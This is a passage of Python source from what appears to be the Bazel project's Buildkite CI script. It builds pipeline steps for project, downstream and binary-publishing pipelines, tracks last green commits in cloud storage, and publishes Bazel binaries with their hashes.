"/var/run/docker.sock:/var/run/docker.sock",
],
}
},
}
if not step["command"]:
del step["command"]
return step
def print_project_pipeline(
configs,
project_name,
http_config,
file_config,
git_repository,
monitor_flaky_tests,
use_but,
incompatible_flags,
notify,
):
task_configs = configs.get("tasks", None)
if not task_configs:
raise BuildkiteException("{0} pipeline configuration is empty.".format(project_name))
pipeline_steps = []
# If the repository is hosted on Git-on-borg, we show the link to the commit Gerrit review
buildkite_repo = os.getenv("BUILDKITE_REPO")
if is_git_on_borg_repo(buildkite_repo):
show_gerrit_review_link(buildkite_repo, pipeline_steps)
task_configs = filter_tasks_that_should_be_skipped(task_configs, pipeline_steps)
# In Bazel Downstream Project pipelines, git_repository and project_name must be specified.
is_downstream_project = (use_but or incompatible_flags) and git_repository and project_name
buildifier_config = configs.get("buildifier")
# Skip Buildifier when we test downstream projects.
if buildifier_config and not is_downstream_project:
buildifier_env_vars = {}
if isinstance(buildifier_config, str):
# Simple format:
# ---
# buildifier: latest
buildifier_env_vars[BUILDIFIER_VERSION_ENV_VAR] = buildifier_config
else:
# Advanced format:
# ---
# buildifier:
# version: latest
# warnings: all
def set_env_var(config_key, env_var_name):
if config_key in buildifier_config:
buildifier_env_vars[env_var_name] = buildifier_config[config_key]
set_env_var("version", BUILDIFIER_VERSION_ENV_VAR)
set_env_var("warnings", BUILDIFIER_WARNINGS_ENV_VAR)
if not buildifier_env_vars:
raise BuildkiteException(
'Invalid buildifier configuration entry "{}"'.format(buildifier_config)
)
pipeline_steps.append(
create_docker_step(
BUILDIFIER_STEP_NAME,
image=BUILDIFIER_DOCKER_IMAGE,
additional_env_vars=buildifier_env_vars,
)
)
# In Bazel Downstream Project pipelines, we should test the project at the last green commit.
git_commit = None
if is_downstream_project:
last_green_commit_url = bazelci_last_green_commit_url(
git_repository, DOWNSTREAM_PROJECTS[project_name]["pipeline_slug"]
)
git_commit = get_last_green_commit(last_green_commit_url)
config_hashes = set()
skipped_due_to_bazel_version = []
for task, task_config in task_configs.items():
platform = get_platform_for_task(task, task_config)
task_name = task_config.get("name")
soft_fail = task_config.get("soft_fail")
# We override the Bazel version in downstream pipelines. This means that two tasks that
# only differ in the value of their explicit "bazel" field will be identical in the
# downstream pipeline, thus leading to duplicate work.
# Consequently, we filter those duplicate tasks here.
if is_downstream_project:
# Skip tasks that require a specific Bazel version
bazel = task_config.get("bazel")
if bazel and bazel != "latest":
skipped_due_to_bazel_version.append(
"{}: '{}'".format(
create_label(platform, project_name, task_name=task_name), bazel
)
)
continue
h = hash_task_config(task, task_config)
if h in config_hashes:
continue
config_hashes.add(h)
shards = task_config.get("shards", "1")
try:
shards = int(shards)
except ValueError:
raise BuildkiteException("Task {} has invalid shard value '{}'".format(task, shards))
step = runner_step(
platform=platform,
task=task,
task_name=task_name,
project_name=project_name,
http_config=http_config,
file_config=file_config,
git_repository=git_repository,
git_commit=git_commit,
monitor_flaky_tests=monitor_flaky_tests,
use_but=use_but,
incompatible_flags=incompatible_flags,
shards=shards,
soft_fail=soft_fail,
)
pipeline_steps.append(step)
if skipped_due_to_bazel_version:
lines = ["\n- {}".format(s) for s in skipped_due_to_bazel_version]
commands = [
"buildkite-agent annotate --style=info '{}' --append --context 'ctx-skipped_due_to_bazel_version'".format(
"".join(lines)
),
"buildkite-agent meta-data set 'has-skipped-steps' 'true'",
]
pipeline_steps.append(
create_step(
label=":pipeline: Print information about skipped tasks due to different Bazel versions",
commands=commands,
platform=DEFAULT_PLATFORM,
)
)
pipeline_slug = os.getenv("BUILDKITE_PIPELINE_SLUG")
all_downstream_pipeline_slugs = []
for _, config in DOWNSTREAM_PROJECTS.items():
all_downstream_pipeline_slugs.append(config["pipeline_slug"])
# We update last green commit in the following cases:
# 1. This job runs on master, stable or main branch (could be a custom build launched manually)
# 2. We intend to run the same job in downstream with Bazel@HEAD (eg. google-bazel-presubmit)
# 3. This job is not:
# - a GitHub pull request
# - uses a custom built Bazel binary (in Bazel Downstream Projects pipeline)
# - testing incompatible flags
# - running `bazelisk --migrate` in a non-downstream pipeline
if (
current_branch_is_main_branch()
and pipeline_slug in all_downstream_pipeline_slugs
and not (is_pull_request() or use_but or incompatible_flags or use_bazelisk_migrate())
):
# We need to call "Try Update Last Green Commit" even if there are failures,
# since we don't want a failing Buildifier step to block the update of
# the last green commit for this project.
# try_update_last_green_commit() ensures that we don't update the commit
# if any build or test steps fail.
pipeline_steps.append({"wait": None, "continue_on_failure": True})
pipeline_steps.append(
create_step(
label="Try Update Last Green Commit",
commands=[
fetch_bazelcipy_command(),
PLATFORMS[DEFAULT_PLATFORM]["python"]
+ " bazelci.py try_update_last_green_commit",
],
platform=DEFAULT_PLATFORM,
)
)
if "validate_config" in configs:
pipeline_steps += create_config_validation_steps()
if use_bazelisk_migrate() and not is_downstream_project:
# Print results of bazelisk --migrate in project pipelines that explicitly set
# the USE_BAZELISK_MIGRATE env var, but that are not being run as part of a
# downstream pipeline.
number = os.getenv("BUILDKITE_BUILD_NUMBER")
pipeline_steps += get_steps_for_aggregating_migration_results(number, notify)
print_pipeline_steps(pipeline_steps, handle_emergencies=not is_downstream_project)
def show_gerrit_review_link(git_repository, pipeline_steps):
host = re.search(r"https://(.+?)\.googlesource", git_repository).group(1)
if not host:
raise BuildkiteException("Couldn't get host name from %s" % git_repository)
text = "The transformed code used in this pipeline can be found under https://{}-review.googlesource.com/q/{}".format(
host, os.getenv("BUILDKITE_COMMIT")
)
commands = ["buildkite-agent annotate --style=info '{}'".format(text)]
pipeline_steps.append(
create_step(
label=":pipeline: Print information about Gerrit Review Link",
commands=commands,
platform=DEFAULT_PLATFORM,
)
)
def is_git_on_borg_repo(git_repository):
return git_repository and "googlesource.com" in git_repository
def hash_task_config(task_name, task_config):
# Two task configs c1 and c2 have the same hash iff they lead to two functionally identical jobs
# in the downstream pipeline. This function discards the "bazel" field (since it's being
# overridden) and the "name" field (since it has no effect on the actual work).
# Moreover, it adds an explicit "platform" field if that's missing.
cpy = task_config.copy()
cpy.pop("bazel", None)
cpy.pop("name", None)
if "platform" not in cpy:
cpy["platform"] = task_name
m = hashlib.md5()
for key in sorted(cpy):
value = "%s:%s;" % (key, cpy[key])
m.update(value.encode("utf-8"))
return m.digest()
def get_platform_for_task(task, task_config):
# Most pipeline configurations have exactly one task per platform, which makes it
# convenient to use the platform name as task ID. Consequently, we use the
# task ID as platform if there is no explicit "platform" field.
return task_config.get("platform", task)
def create_config_validation_steps():
output = execute_command_and_get_output(
["git", "diff-tree", "--no-commit-id", "--name-only", "-r", os.getenv("BUILDKITE_COMMIT")]
)
config_files = [
path
for path in output.split("\n")
if path.startswith(".bazelci/") and os.path.splitext(path)[1] in CONFIG_FILE_EXTENSIONS
]
return [
create_step(
label=":cop: Validate {}".format(f),
commands=[
fetch_bazelcipy_command(),
"{} bazelci.py project_pipeline --file_config={}".format(
PLATFORMS[DEFAULT_PLATFORM]["python"], f
),
],
platform=DEFAULT_PLATFORM,
)
for f in config_files
]
def print_pipeline_steps(pipeline_steps, handle_emergencies=True):
if handle_emergencies:
emergency_step = create_emergency_announcement_step_if_necessary()
if emergency_step:
pipeline_steps.insert(0, emergency_step)
print(yaml.dump({"steps": pipeline_steps}))
def create_emergency_announcement_step_if_necessary():
style = "error"
message, issue_url, last_good_bazel = None, None, None
try:
emergency_settings = load_remote_yaml_file(EMERGENCY_FILE_URL)
message = emergency_settings.get("message")
issue_url = emergency_settings.get("issue_url")
last_good_bazel = emergency_settings.get("last_good_bazel")
except urllib.error.HTTPError as ex:
message = str(ex)
style = "warning"
if not any([message, issue_url, last_good_bazel]):
return
text = '<span class="h1">:rotating_light: Emergency :rotating_light:</span>\n'
if message:
text += "- {}\n".format(message)
if issue_url:
text += '- Please check this <a href="{}">issue</a> for more details.\n'.format(issue_url)
if last_good_bazel:
text += (
"- Default Bazel version is *{}*, "
"unless the pipeline configuration specifies an explicit version."
).format(last_good_bazel)
return create_step(
label=":rotating_light: Emergency :rotating_light:",
commands=[
'buildkite-agent annotate --append --style={} --context "omg" "{}"'.format(style, text)
],
platform=DEFAULT_PLATFORM,
)
def runner_step(
platform,
task,
task_name=None,
project_name=None,
http_config=None,
file_config=None,
git_repository=None,
git_commit=None,
monitor_flaky_tests=False,
use_but=False,
incompatible_flags=None,
shards=1,
soft_fail=None,
):
command = PLATFORMS[platform]["python"] + " bazelci.py runner --task=" + task
if http_config:
command += " --http_config=" + http_config
if file_config:
command += " --file_config=" + file_config
if git_repository:
command += " --git_repository=" + git_repository
if git_commit:
command += " --git_commit=" + git_commit
if monitor_flaky_tests:
command += " --monitor_flaky_tests"
if use_but:
command += " --use_but"
for flag in incompatible_flags or []:
command += " --incompatible_flag=" + flag
label = create_label(platform, project_name, task_name=task_name)
return create_step(
label=label,
commands=[fetch_bazelcipy_command(), command],
platform=platform,
shards=shards,
soft_fail=soft_fail,
)
def fetch_bazelcipy_command():
return "curl -sS {0} -o bazelci.py".format(SCRIPT_URL)
def fetch_incompatible_flag_verbose_failures_command():
return "curl -sS {0} -o incompatible_flag_verbose_failures.py".format(
INCOMPATIBLE_FLAG_VERBOSE_FAILURES_URL
)
def fetch_aggregate_incompatible_flags_test_result_command():
return "curl -sS {0} -o aggregate_incompatible_flags_test_result.py".format(
AGGREGATE_INCOMPATIBLE_TEST_RESULT_URL
)
def upload_project_pipeline_step(
project_name, git_repository, http_config, file_config, incompatible_flags
):
pipeline_command = (
'{0} bazelci.py project_pipeline --project_name="{1}" ' + "--git_repository={2}"
).format(PLATFORMS[DEFAULT_PLATFORM]["python"], project_name, git_repository)
if incompatible_flags is None:
pipeline_command += " --use_but"
else:
for flag in incompatible_flags:
pipeline_command += " --incompatible_flag=" + flag
if http_config:
pipeline_command += " --http_config=" + http_config
if file_config:
pipeline_command += " --file_config=" + file_config
pipeline_command += " | buildkite-agent pipeline upload"
return create_step(
label="Setup {0}".format(project_name),
commands=[fetch_bazelcipy_command(), pipeline_command],
platform=DEFAULT_PLATFORM,
)
def create_label(platform, project_name, build_only=False, test_only=False, task_name=None):
if build_only and test_only:
raise BuildkiteException("build_only and test_only cannot be true at the same time")
platform_display_name = PLATFORMS[platform]["emoji-name"]
if build_only:
label = "Build "
elif test_only:
label = "Test "
else:
label = ""
platform_label = (
"{0} on {1}".format(task_name, platform_display_name)
if task_name
else platform_display_name
)
if project_name:
label += "{0} ({1})".format(project_name, platform_label)
else:
label += platform_label
return label
def bazel_build_step(
task,
platform,
project_name,
http_config=None,
file_config=None,
build_only=False,
test_only=False,
):
pipeline_command = PLATFORMS[platform]["python"] + " bazelci.py runner"
if build_only:
pipeline_command += " --build_only --save_but"
if test_only:
pipeline_command += " --test_only"
if http_config:
pipeline_command += " --http_config=" + http_config
if file_config:
pipeline_command += " --file_config=" + file_config
pipeline_command += " --task=" + task
return create_step(
label=create_label(platform, project_name, build_only, test_only),
commands=[fetch_bazelcipy_command(), pipeline_command],
platform=platform,
)
def filter_tasks_that_should_be_skipped(task_configs, pipeline_steps):
skip_tasks = get_skip_tasks()
if not skip_tasks:
return task_configs
actually_skipped = []
skip_tasks = set(skip_tasks)
for task in list(task_configs.keys()):
if task in skip_tasks:
actually_skipped.append(task)
del task_configs[task]
skip_tasks.remove(task)
if not task_configs:
raise BuildkiteException(
"Nothing to do since all tasks in the configuration should be skipped."
)
annotations = []
if actually_skipped:
annotations.append(
("info", "Skipping the following task(s): {}".format(", ".join(actually_skipped)))
)
if skip_tasks:
annotations.append(
(
"warning",
(
"The following tasks should have been skipped, "
"but were not part of the configuration: {}"
).format(", ".join(skip_tasks)),
)
)
if annotations:
print_skip_task_annotations(annotations, pipeline_steps)
return task_configs
def get_skip_tasks():
value = os.getenv(SKIP_TASKS_ENV_VAR, "")
return [v for v in value.split(",") if v]
def print_skip_task_annotations(annotations, pipeline_steps):
commands = [
"buildkite-agent annotate --style={} '{}' --context 'ctx-{}'".format(s, t, hash(t))
for s, t in annotations
]
pipeline_steps.append(
create_step(
label=":pipeline: Print information about skipped tasks",
commands=commands,
platform=DEFAULT_PLATFORM,
)
)
def print_bazel_publish_binaries_pipeline(task_configs, http_config, file_config):
if not task_configs:
raise BuildkiteException("Bazel publish binaries pipeline configuration is empty.")
pipeline_steps = []
task_configs = filter_tasks_that_should_be_skipped(task_configs, pipeline_steps)
platforms = [get_platform_for_task(t, tc) for t, tc in task_configs.items()]
# These are the platforms that the bazel_publish_binaries.yml config is actually building.
configured_platforms = set(filter(should_publish_binaries_for_platform, platforms))
# These are the platforms that we want to build and publish according to this script.
expected_platforms = set(filter(should_publish_binaries_for_platform, PLATFORMS))
# We can skip this check if we're not on the main branch, because then we're probably
# building a one-off custom debugging binary anyway.
if current_branch_is_main_branch() and not expected_platforms.issubset(configured_platforms):
raise BuildkiteException(
"Bazel publish binaries pipeline needs to build Bazel for every commit on all publish_binary-enabled platforms."
)
# Build Bazel
for task, task_config in task_configs.items():
pipeline_steps.append(
bazel_build_step(
task,
get_platform_for_task(task, task_config),
"Bazel",
http_config,
file_config,
build_only=True,
)
)
pipeline_steps.append("wait")
# If all builds succeed, publish the Bazel binaries to GCS.
pipeline_steps.append(
create_step(
label="Publish Bazel Binaries",
commands=[
fetch_bazelcipy_command(),
PLATFORMS[DEFAULT_PLATFORM]["python"] + " bazelci.py publish_binaries",
],
platform=DEFAULT_PLATFORM,
)
)
print_pipeline_steps(pipeline_steps)
def should_publish_binaries_for_platform(platform):
if platform not in PLATFORMS:
raise BuildkiteException("Unknown platform '{}'".format(platform))
return PLATFORMS[platform]["publish_binary"]
def print_disabled_projects_info_box_step():
info_text = ["Downstream testing is disabled for the following projects :sadpanda:"]
for project, config in DOWNSTREAM_PROJECTS.items():
disabled_reason = config.get("disabled_reason", None)
if disabled_reason:
info_text.append("* **%s**: %s" % (project, disabled_reason))
if len(info_text) == 1:
return None
return create_step(
label=":sadpanda:",
commands=[
'buildkite-agent annotate --append --style=info "\n' + "\n".join(info_text) + '\n"'
],
platform=DEFAULT_PLATFORM,
)
def print_incompatible_flags_info_box_step(incompatible_flags_map):
info_text = ["Build and test with the following incompatible flags:"]
for flag in incompatible_flags_map:
info_text.append("* **%s**: %s" % (flag, incompatible_flags_map[flag]))
if len(info_text) == 1:
return None
return create_step(
label="Incompatible flags info",
commands=[
'buildkite-agent annotate --append --style=info "\n' + "\n".join(info_text) + '\n"'
],
platform=DEFAULT_PLATFORM,
)
def fetch_incompatible_flags():
"""
Return a list of incompatible flags to be tested in downstream with the current release Bazel
"""
incompatible_flags = {}
# If INCOMPATIBLE_FLAGS environment variable is set, we get incompatible flags from it.
if "INCOMPATIBLE_FLAGS" in os.environ:
for flag in os.environ["INCOMPATIBLE_FLAGS"].split():
# We are not able to get the github link for this flag from INCOMPATIBLE_FLAGS,
# so just assign the url to empty string.
incompatible_flags[flag] = ""
return incompatible_flags
bazel_major_version = get_bazel_major_version()
output = subprocess.check_output(
[
"curl",
"https://api.github.com/search/issues?per_page=100&q=repo:bazelbuild/bazel+label:migration-%s"
% bazel_major_version,
]
).decode("utf-8")
issue_info = json.loads(output)
for issue in issue_info["items"]:
# Every incompatible flags issue should start with "<incompatible flag name (without --)>:"
name = "--" + issue["title"].split(":")[0]
url = issue["html_url"]
if name.startswith("--incompatible_"):
incompatible_flags[name] = url
else:
eprint(
f"{name} is not recognized as an incompatible flag, please modify the issue title "
f'of {url} to "<incompatible flag name (without --)>:..."'
)
return incompatible_flags
def get_bazel_major_version():
# Get bazel major version on CI, eg. 0.21 from "Build label: 0.21.0\n..."
output = subprocess.check_output(
["bazel", "--nomaster_bazelrc", "--bazelrc=/dev/null", "version"]
).decode("utf-8")
return output.split()[2].rsplit(".", 1)[0]
def print_bazel_downstream_pipeline(
task_configs, http_config, file_config, test_incompatible_flags, test_disabled_projects, notify
):
if not task_configs:
raise BuildkiteException("Bazel downstream pipeline configuration is empty.")
pipeline_steps = []
task_configs = filter_tasks_that_should_be_skipped(task_configs, pipeline_steps)
pipeline_steps = []
info_box_step = print_disabled_projects_info_box_step()
if info_box_step is not None:
pipeline_steps.append(info_box_step)
if not test_incompatible_flags:
for task, task_config in task_configs.items():
pipeline_steps.append(
bazel_build_step(
task,
get_platform_for_task(task, task_config),
"Bazel",
http_config,
file_config,
build_only=True,
)
)
pipeline_steps.append("wait")
incompatible_flags = None
if test_incompatible_flags:
incompatible_flags_map = fetch_incompatible_flags()
if not incompatible_flags_map:
step = create_step(
label="No Incompatible flags info",
commands=[
'buildkite-agent annotate --style=error "No incompatible flag issue is found on github for current version of Bazel." --context "noinc"'
],
platform=DEFAULT_PLATFORM,
)
pipeline_steps.append(step)
print_pipeline_steps(pipeline_steps)
return
info_box_step = print_incompatible_flags_info_box_step(incompatible_flags_map)
if info_box_step is not None:
pipeline_steps.append(info_box_step)
incompatible_flags = list(incompatible_flags_map.keys())
pipeline_steps.append(create_step(
label="Print skipped tasks annotation",
commands=['buildkite-agent annotate --style=info "The following tasks were skipped since they require specific Bazel versions:\n" --context "ctx-skipped_due_to_bazel_version"'],
platform=DEFAULT_PLATFORM))
for project, config in DOWNSTREAM_PROJECTS.items():
disabled_reason = config.get("disabled_reason", None)
# If test_disabled_projects is true, we add configs for disabled projects.
# If test_disabled_projects is false, we add configs for not disabled projects.
if (test_disabled_projects and disabled_reason) or (
not test_disabled_projects and not disabled_reason
):
pipeline_steps.append(
upload_project_pipeline_step(
project_name=project,
git_repository=config["git_repository"],
http_config=config.get("http_config", None),
file_config=config.get("file_config", None),
incompatible_flags=incompatible_flags,
)
)
pipeline_steps.append(create_step(
label="Remove skipped tasks annotation if unneeded",
commands=['buildkite-agent meta-data exists "has-skipped-steps" || buildkite-agent annotation remove --context "ctx-skipped_due_to_bazel_version"'],
platform=DEFAULT_PLATFORM))
if test_incompatible_flags:
current_build_number = os.environ.get("BUILDKITE_BUILD_NUMBER", None)
if not current_build_number:
raise BuildkiteException("Not running inside Buildkite")
if use_bazelisk_migrate():
pipeline_steps += get_steps_for_aggregating_migration_results(
current_build_number, notify
)
else:
pipeline_steps.append({"wait": "~", "continue_on_failure": "true"})
pipeline_steps.append(
create_step(
label="Test failing jobs with incompatible flag separately",
commands=[
fetch_bazelcipy_command(),
fetch_incompatible_flag_verbose_failures_command(),
PLATFORMS[DEFAULT_PLATFORM]["python"]
+ " incompatible_flag_verbose_failures.py --build_number=%s | buildkite-agent pipeline upload"
% current_build_number,
],
platform=DEFAULT_PLATFORM,
)
)
if (
not test_disabled_projects
and not test_incompatible_flags
and current_branch_is_main_branch()
):
# Only update the last green downstream commit in the regular Bazel@HEAD + Downstream pipeline.
pipeline_steps.append("wait")
pipeline_steps.append(
create_step(
label="Try Update Last Green Downstream Commit",
commands=[
fetch_bazelcipy_command(),
PLATFORMS[DEFAULT_PLATFORM]["python"]
+ " bazelci.py try_update_last_green_downstream_commit",
],
platform=DEFAULT_PLATFORM,
)
)
print_pipeline_steps(pipeline_steps)
def get_steps_for_aggregating_migration_results(current_build_number, notify):
parts = [
PLATFORMS[DEFAULT_PLATFORM]["python"],
"aggregate_incompatible_flags_test_result.py",
"--build_number=%s" % current_build_number,
]
if notify:
parts.append("--notify")
return [
{"wait": "~", "continue_on_failure": "true"},
create_step(
label="Aggregate incompatible flags test result",
commands=[
fetch_bazelcipy_command(),
fetch_aggregate_incompatible_flags_test_result_command(),
" ".join(parts),
],
platform=DEFAULT_PLATFORM,
),
]
def bazelci_builds_download_url(platform, git_commit):
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-builds"
return "https://storage.googleapis.com/{}/artifacts/{}/{}/bazel".format(
bucket_name, platform, git_commit
)
def bazelci_builds_nojdk_download_url(platform, git_commit):
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-builds"
return "https://storage.googleapis.com/{}/artifacts/{}/{}/bazel_nojdk".format(
bucket_name, platform, git_commit
)
def bazelci_builds_gs_url(platform, git_commit):
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-builds"
return "gs://{}/artifacts/{}/{}/bazel".format(bucket_name, platform, git_commit)
def bazelci_builds_nojdk_gs_url(platform, git_commit):
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-builds"
return "gs://{}/artifacts/{}/{}/bazel_nojdk".format(bucket_name, platform, git_commit)
def bazelci_latest_build_metadata_url():
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-builds"
return "gs://{}/metadata/latest.json".format(bucket_name)
def bazelci_builds_metadata_url(git_commit):
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-builds"
return "gs://{}/metadata/{}.json".format(bucket_name, git_commit)
def bazelci_last_green_commit_url(git_repository, pipeline_slug):
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-untrusted-builds"
return "gs://{}/last_green_commit/{}/{}".format(
bucket_name, git_repository[len("https://") :], pipeline_slug
)
def bazelci_last_green_downstream_commit_url():
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-untrusted-builds"
return "gs://{}/last_green_commit/downstream_pipeline".format(bucket_name)
def get_last_green_commit(last_green_commit_url):
try:
return (
subprocess.check_output(
[gsutil_command(), "cat", last_green_commit_url], env=os.environ
)
.decode("utf-8")
.strip()
)
except subprocess.CalledProcessError:
return None
def try_update_last_green_commit():
org_slug = os.getenv("BUILDKITE_ORGANIZATION_SLUG")
pipeline_slug = os.getenv("BUILDKITE_PIPELINE_SLUG")
build_number = os.getenv("BUILDKITE_BUILD_NUMBER")
current_job_id = os.getenv("BUILDKITE_JOB_ID")
client = BuildkiteClient(org=org_slug, pipeline=pipeline_slug)
build_info = client.get_build_info(build_number)
# Find any failing steps other than Buildifier and steps with soft_fail enabled then "try update last green".
def has_failed(job):
state = job.get("state")
# Ignore steps that don't have a state (like "wait").
return (
state is not None
and state != "passed"
and not job.get("soft_failed")
and job["id"] != current_job_id
and job["name"] != BUILDIFIER_STEP_NAME
)
failing_jobs = [j["name"] for j in build_info["jobs"] if has_failed(j)]
if failing_jobs:
raise BuildkiteException(
"Cannot update last green commit due to {} failing step(s): {}".format(
len(failing_jobs), ", ".join(failing_jobs)
)
)
git_repository = os.getenv("BUILDKITE_REPO")
last_green_commit_url = bazelci_last_green_commit_url(git_repository, pipeline_slug)
update_last_green_commit_if_newer(last_green_commit_url)
def update_last_green_commit_if_newer(last_green_commit_url):
last_green_commit = get_last_green_commit(last_green_commit_url)
current_commit = subprocess.check_output(["git", "rev-parse", "HEAD"]).decode("utf-8").strip()
if last_green_commit:
success = False
try:
execute_command(["git", "fetch", "-v", "origin", last_green_commit])
success = True
except subprocess.CalledProcessError:
# If there was an error fetching the commit it typically means
# that the commit does not exist anymore - due to a force push. In
# order to recover from that assume that the current commit is the
# newest commit.
result = [current_commit]
finally:
if success:
result = (
subprocess.check_output(
["git", "rev-list", "%s..%s" % (last_green_commit, current_commit)]
)
.decode("utf-8")
.strip()
)
else:
result = None
# If current_commit is newer that last_green_commit, `git rev-list A..B` will output a bunch of
# commits, otherwise the output should be empty.
if not last_green_commit or result:
execute_command(
[
"echo %s | %s -h 'Cache-Control: no-store' cp - %s"
% (current_commit, gsutil_command(), last_green_commit_url)
],
shell=True,
)
else:
eprint(
"Updating abandoned: last green commit (%s) is not older than current commit (%s)."
% (last_green_commit, current_commit)
)
def try_update_last_green_downstream_commit():
last_green_commit_url = bazelci_last_green_downstream_commit_url()
update_last_green_commit_if_newer(last_green_commit_url)
def latest_generation_and_build_number():
generation = None
output = None
for attempt in range(5):
output = subprocess.check_output(
[gsutil_command(), "stat", bazelci_latest_build_metadata_url()], env=os.environ
)
match = re.search("Generation:[ ]*([0-9]+)", output.decode("utf-8"))
if not match:
raise BuildkiteException("Couldn't parse generation. gsutil output format changed?")
generation = match.group(1)
match = re.search(r"Hash \(md5\):[ ]*([^\s]+)", output.decode("utf-8"))
if not match:
raise BuildkiteException("Couldn't parse md5 hash. gsutil output format changed?")
expected_md5hash = base64.b64decode(match.group(1))
output = subprocess.check_output(
[gsutil_command(), "cat", bazelci_latest_build_metadata_url()], env=os.environ
)
hasher = hashlib.md5()
hasher.update(output)
actual_md5hash = hasher.digest()
if expected_md5hash == actual_md5hash:
break
info = json.loads(output.decode("utf-8"))
return generation, info["build_number"]
def sha256_hexdigest(filename):
sha256 = hashlib.sha256()
with open(filename, "rb") as f:
for block in iter(lambda: f.read(65536), b""):
sha256.update(block)
return sha256.hexdigest()
def upload_bazel_binaries():
"""
Uploads all Bazel binaries to a deterministic URL based on the current Git commit.
Returns maps of platform names to sha256 hashes of the corresponding bazel and bazel_nojdk binaries.
"""
bazel_hashes = {}
bazel_nojdk_hashes = {}
for platform_name, platform in PLATFORMS.items():
if not should_publish_binaries_for_platform(platform_name):
continue
tmpdir = tempfile.mkdtemp()
try:
bazel_binary_path = download_bazel_binary(tmpdir, platform_name)
# One platform that we build on can generate binaries for multiple platforms, e.g.
# the centos7 platform generates binaries for the "centos7" platform, but also
# for the generic "linux" platform.
for target_platform_name in platform["publish_binary"]:
execute_command(
[
gsutil_command(),
"cp",
bazel_binary_path,
bazelci_builds_gs_url(target_platform_name, os.environ["BUILDKITE_COMMIT"]),
]
)
bazel_hashes[target_platform_name] = sha256_hexdigest(bazel_binary_path)
# Also publish bazel_nojdk binaries.
bazel_nojdk_binary_path = download_bazel_nojdk_binary(tmpdir, platform_name)
for target_platform_name in platform["publish_binary"]:
execute_command(
[
gsutil_command(),
"cp",
bazel_nojdk_binary_path,
bazelci_builds_nojdk_gs_url(
target_platform_name, os.environ["BUILDKITE_COMMIT"]
),
]
)
bazel_nojdk_hashes[target_platform_name] = sha256_hexdigest(bazel_nojdk_binary_path)
except subprocess.CalledProcessError as e:
# If we're not on the main branch, we're probably building a custom one-off binary and
# ignore failures for individual platforms (it's possible that we didn't build binaries
# for all platforms).
if not current_branch_is_main_branch():
eprint(
"Ignoring failure to download and publish Bazel binary for platform {}: {}".format(
platform_name, e
)
)
else:
raise e
finally:
shutil.rmtree(tmpdir)
return bazel_hashes, bazel_nojdk_hashes
def try_publish_binaries(bazel_hashes, bazel_nojdk_hashes, build_number, expected_generation):
"""
Uploads the info.json file that contains information about the latest Bazel commit that was
successfully built on CI.
"""
now = datetime.datetime.now()
git_commit = os.environ["BUILDKITE_COMMIT"]
info = {
"build_number": build_number,
"build_time": now.strftime("%d-%m-%Y %H:%M"),
"git_commit": git_commit,
"platforms": {},
}
for platform, sha256 in bazel_hashes.items():
info["platforms"][platform] = {
"url": bazelci_builds_download_url(platform, git_commit),
"sha256": sha256,
"nojdk_url": bazelci_builds_nojdk_download_url(platform, git_commit),
"nojdk_sha256": bazel_nojdk_hashes[platform],
}
tmpdir = tempfile.mkdtemp()
try:
info_file = os.path.join(tmpdir, "info.json")
with open(info_file, mode="w", encoding="utf-8") as fp:
json.dump(info, fp, indent=2, sort_keys=True)
try:
execute_command(
[
gsutil_command(),
"-h",
"x-goog-if-generation-match:" + expected_generation,
"-h",
"Content-Type:application/json",
"cp",
info_file,
bazelci_latest_build_metadata_url(),
]
)
except subprocess.CalledProcessError:
raise BinaryUploadRaceException()
execute_command(
[
gsutil_command(),
"cp",
bazelci_latest_build_metadata_url(),
bazelci_builds_metadata_url(git_commit),
]
)
finally:
shutil.rmtree(tmpdir)
def publish_binaries():
"""
Publish Bazel binaries to GCS.
"""
current_build_number = os.environ.get("BUILDKITE_BUILD_NUMBER", None)
if not current_build_number:
raise BuildkiteException("Not running inside Buildkite")
current_build_number = int(current_build_number)
# Upload the Bazel binaries for this commit.
bazel_hashes, bazel_nojdk_hashes = upload_bazel_binaries()
# Try to update the info.json with data about our build. This will fail (expectedly) if we're
# not the latest build. Only do this if we're building binaries from the main branch to avoid
# accidentally publishing a custom debug build as the "latest" Bazel binary.
if current_branch_is_main_branch():
for _ in range(5):
latest_generation, latest_build_number = latest_generation_and_build_number()
if current_build_number <= latest_build_number:
eprint(
(
"Current build '{0}' is not newer than latest published '{1}'. "
+ "Skipping publishing of binaries."
).format(current_build_number, latest_build_number)
)
break
try:
try_publish_binaries(
bazel_hashes, bazel_nojdk_hashes, current_build_number, latest_generation
)
except BinaryUploadRaceException:
# Retry.
continue
eprint(
"Successfully updated '{0}' to binaries from build {1}.".format(
bazelci_latest_build_metadata_url(), current_build_number
)
)
break
else:
raise BuildkiteException("Could not publish binaries, ran out of attempts.")
# This is so that multiline python strings are represented as YAML
# block strings.
def str_presenter(dumper, data):
if len(data.splitlines()) > 1: # check for multiline string
return dumper.represent_scalar("tag:yaml.org,2002:str", data, style="|")
return dumper.represent_scalar("tag:yaml.org,2002:str", data)
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
yaml.add_representer(str, str_presenter)
parser = argparse.ArgumentParser(description="Bazel Continuous Integration Script")
parser.add_argument("--script", type=str)
subparsers = parser.add_subparsers(dest="subparsers_name")
bazel_publish_binaries_pipeline = subparsers.add_parser("bazel_publish_binaries_pipeline")
bazel_publish_binaries_pipeline.add_argument("--file_config", type=str)
bazel_publish_binaries_pipeline.add_argument("--http_config", type=str)
bazel_publish_binaries_pipeline.add_argument("--git_repository", type=str)
bazel_downstream_pipeline = subparsers.add_parser("bazel_downstream_pipeline")
bazel_downstream_pipeline.add_argument("--file_config", type=str)
bazel_downstream_pipeline.add_argument("--http_config", type=str)
bazel_downstream_pipeline.add_argument("--git_repository", type=str)
bazel_downstream_pipeline.add_argument(
"--test_incompatible_flags", type=bool, nargs="?", const=True
)
bazel_downstream_pipeline.add_argument(
"--test_disabled_projects", type=bool, nargs="?", const=True
)
bazel_downstream_pipeline.add_argument("--notify", type=bool, nargs="?", const=True)
project_pipeline = subparsers.add_parser("project_pipeline")
project_pipeline.add_argument("--project_name", type=str)
project_pipeline.add_argument("--file_config", type=str)
